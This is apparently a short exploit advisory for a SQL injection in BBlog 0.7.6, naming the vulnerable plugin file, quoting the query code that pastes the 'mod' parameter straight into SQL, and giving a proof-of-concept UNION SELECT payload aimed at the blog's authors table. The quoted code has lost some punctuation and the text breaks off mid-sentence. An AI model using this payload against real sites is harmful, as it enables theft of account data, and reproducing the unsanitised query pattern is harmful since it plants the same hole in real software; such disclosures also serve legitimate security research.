BBlog 0.7.6 - 'mod' SQL Injection

BBlog 0.7.6 SQL Injection Vuln Vulnpath: /bblogplugins/builtin.help.php Vuln: if$GET'mod' $pluginrow = $bBlog-getrow"select from ".TPLUGINS." where name='".$GET'mod'."' and type='modifier'"; PoC: ?pid=1&mod='+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+bbauthors-- help: On the number you can see...